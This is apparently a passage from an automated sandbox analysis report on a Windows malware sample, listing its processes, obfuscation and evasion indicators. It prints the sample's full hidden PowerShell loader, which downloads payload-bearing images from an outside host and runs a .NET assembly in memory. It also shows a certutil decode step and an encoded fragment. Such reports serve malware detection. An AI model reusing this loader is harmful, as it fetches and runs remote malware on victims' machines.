H0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD348A00BD pushad ; iretd 3_2_00007FFD348A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD348A0988 push E95B64D0h; ret 3_2_00007FFD348A09C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0041A041 push esp; retf 10_2_0041A044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00405047 push esi; retf 10_2_00405065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040C8F3 pushad ; iretd 10_2_0040C8F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004051F8 pushfd ; iretd 10_2_00405202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00414223 push edi; ret 10_2_004142C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00417A39 push edx; retf 10_2_00417A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00414282 push edi; ret 10_2_004142C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040839B push 0000002Ch; iretd 10_2_004083A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004174C6 push esi; iretd 10_2_004174E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00417CEC push eax; retf 10_2_00417CFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00417D60 push ebx; ret 10_2_00417D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040C645 push ebp; iretd 10_2_0040C64F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00403650 push eax; ret 10_2_00403652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00415743 push esi; retf 10_2_0041574E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF09AD push ecx; mov dword ptr [esp], ecx 10_2_00FF09B6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034D7300 pushad ; iretd 12_2_034D7301
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E4A4E push esp; retf 12_2_034E4A51
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034CFA54 push esi; retf 12_2_034CFA72
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E0150 push esi; retf 12_2_034E015B
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034D7052 push ebp; iretd 12_2_034D705C
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E276D push ebx; ret 12_2_034E2776
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E26F9 push eax; retf 12_2_034E2709
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034D2DA8 push 0000002Ch; iretd 12_2_034D2DB6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E2446 push edx; retf 12_2_034E2482
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034CFC05 pushfd ; iretd 12_2_034CFC0F
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 12_2_034E0C92 push edi; iretd 12_2_034E0C93
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046109AD push ecx; mov dword ptr [esp], ecx 13_2_046109B6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_05669DD9 push ss; retf 17_2_05669DDA
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 17_2_0566DCB3 push ebp; iretd 17_2_0566DCBD

Hooking and other Techniques for Hiding and Protection
barindex
Uses certutil -decode
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D1C0 rdtsc 10_2_0106D1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2005 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 798 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4172 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5651 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\SyncHost.exe API coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep count: 4172 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep count: 5651 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe TID: 2812 Thread sleep time: -70000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\SyncHost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: -2-2FfKI.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
